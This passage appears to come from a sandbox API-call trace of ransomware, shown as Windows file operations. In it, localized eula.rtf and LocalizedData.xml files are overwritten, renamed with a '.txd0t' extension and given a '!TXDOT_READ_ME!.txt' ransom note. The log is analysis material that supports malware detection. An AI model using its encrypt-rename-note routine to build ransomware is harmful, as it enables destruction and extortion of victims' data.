liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.538] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.540] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeacf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.540] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x15100, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x15100, lpOverlapped=0x0) returned 1 [0085.542] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeaf00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.542] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x15100, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x15100, lpOverlapped=0x0) returned 1 [0085.543] FlushFileBuffers (hFile=0x468) returned 1 [0085.687] GetProcessHeap () returned 0xe30000 [0085.687] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0085.687] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0085.687] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="LocalizedData.xml" [0085.687] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.687] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt") returned 1 [0085.688] GetProcessHeap () returned 0xe30000 [0085.688] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0085.688] CloseHandle (hObject=0x468) returned 1 [0085.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.txd0t")) returned 1 [0085.690] SetEvent (hEvent=0x40c) returned 1 [0085.690] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.700] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" [0085.700] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t" [0085.700] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t") returned 0 [0085.701] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.701] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0085.701] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=6851) returned 1 [0085.701] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.701] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.704] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffffe33d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.704] ReadFile (in: hFile=0x478, lpBuffer=0x415b020, nNumberOfBytesToRead=0x1ac0, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0x1ac0, lpOverlapped=0x0) returned 1 [0085.704] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffffe540, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.704] WriteFile (in: hFile=0x478, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0x1ac0, lpOverlapped=0x0) returned 1 [0085.704] FlushFileBuffers (hFile=0x478) returned 1 [0085.706] GetProcessHeap () returned 0xe30000 [0085.706] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.706] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" [0085.706] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="eula.rtf" [0085.706] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.706] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt") returned 0 [0085.706] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1037\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0085.708] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0085.708] FlushFileBuffers (hFile=0x468) returned 1 [0085.711] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0085.711] FlushFileBuffers (hFile=0x468) returned 1 [0085.712] CloseHandle (hObject=0x468) returned 1 [0085.712] GetProcessHeap () returned 0xe30000 [0085.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.713] CloseHandle (hObject=0x478) returned 1 [0085.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t")) returned 1 [0085.713] SetEvent (hEvent=0x40c) returned 1 [0085.713] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.716] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0085.716] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t" [0085.716] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t") returned 0 [0085.716] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.717] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0085.717] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=72076) returned 1 [0085.717] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.717] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.719] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffee474, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.719] ReadFile (in: hFile=0x478, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11980, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11980, lpOverlapped=0x0) returned 1 [0085.723] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffee680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.723] WriteFile (in: hFile=0x478, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11980, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11980, lpOverlapped=0x0) returned 1 [0085.723] FlushFileBuffers (hFile=0x478) returned 1 [0085.833] GetProcessHeap () returned 0xe30000 [0085.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.833] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0085.834] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="LocalizedData.xml" [0085.834] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.834] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt") returned 1 [0085.834] GetProcessHeap () returned 0xe30000 [0085.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.834] CloseHandle (hObject=0x478) returned 1 [0085.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.txd0t")) returned 1 [0085.834] SetEvent (hEvent=0x40c) returned 1 [0085.834] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.841] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0085.841] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t" [0085.841] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t") returned 0 [0085.841] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.842] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0085.842] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=68226) returned 1 [0085.842] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.842] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.844] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef37e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.844] ReadFile (in: hFile=0x478, lpBuffer=0x415b020, nNumberOfBytesToRead=0x10a80, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x10a80, lpOverlapped=0x0) returned 1 [0085.846] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef580, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.846] WriteFile (in: hFile=0x478, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x10a80, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x10a80, lpOverlapped=0x0) returned 1 [0085.847] FlushFileBuffers (hFile=0x478) returned 1 [0085.860] GetProcessHeap () returned 0xe30000 [0085.860] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.860] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0085.860] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="LocalizedData.xml" [0085.860] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.860] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt") returned 0 [0085.860] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1041\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0085.866] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f734*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x4a9f734*, lpNumberOfBytesWritten=0x4a9f730*=0x2, lpOverlapped=0x0) returned 1 [0085.867] FlushFileBuffers (hFile=0x47c) returned 1 [0085.876] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f730*=0x7f0, lpOverlapped=0x0) returned 1 [0085.880] FlushFileBuffers (hFile=0x47c) returned 1 [0085.893] CloseHandle (hObject=0x47c) returned 1 [0085.893] GetProcessHeap () returned 0xe30000 [0085.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.893] CloseHandle (hObject=0x478) returned 1 [0085.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.txd0t")) returned 1 [0085.894] SetEvent (hEvent=0x40c) returned 1 [0085.894] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.896] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" [0085.896] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t" [0085.896] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t") returned 0 [0085.896] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.900] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0085.900] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=3546) returned 1 [0085.900] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.900] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.903] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffff026, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.903] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xdd0, lpOverlapped=0x0) returned 1 [0085.903] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffff230, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.903] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xdd0, lpOverlapped=0x0) returned 1 [0085.904] FlushFileBuffers (hFile=0x46c) returned 1 [0085.907] GetProcessHeap () returned 0xe30000 [0085.907] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.907] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" [0085.907] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="eula.rtf" [0085.907] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.907] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt") returned 0 [0085.908] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1043\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0085.913] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0085.914] FlushFileBuffers (hFile=0x478) returned 1 [0085.916] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0085.917] FlushFileBuffers (hFile=0x478) returned 1 [0085.918] CloseHandle (hObject=0x478) returned 1 [0085.918] GetProcessHeap () returned 0xe30000 [0085.918] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.918] CloseHandle (hObject=0x46c) returned 1 [0085.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t")) returned 1 [0085.919] SetEvent (hEvent=0x40c) returned 1 [0085.919] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.920] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" [0085.920] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t" [0085.920] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t") returned 0 [0085.920] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.924] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0085.924] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=3046) returned 1 [0085.924] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.924] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.925] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffff21a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.925] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xbe0, lpOverlapped=0x0) returned 1 [0085.925] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffff420, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.925] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xbe0, lpOverlapped=0x0) returned 1 [0085.926] FlushFileBuffers (hFile=0x46c) returned 1 [0086.000] GetProcessHeap () returned 0xe30000 [0086.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0086.000] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" [0086.000] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="eula.rtf" [0086.000] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.000] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt") returned 0 [0086.000] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1044\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0086.003] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0086.004] FlushFileBuffers (hFile=0x478) returned 1 [0086.168] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 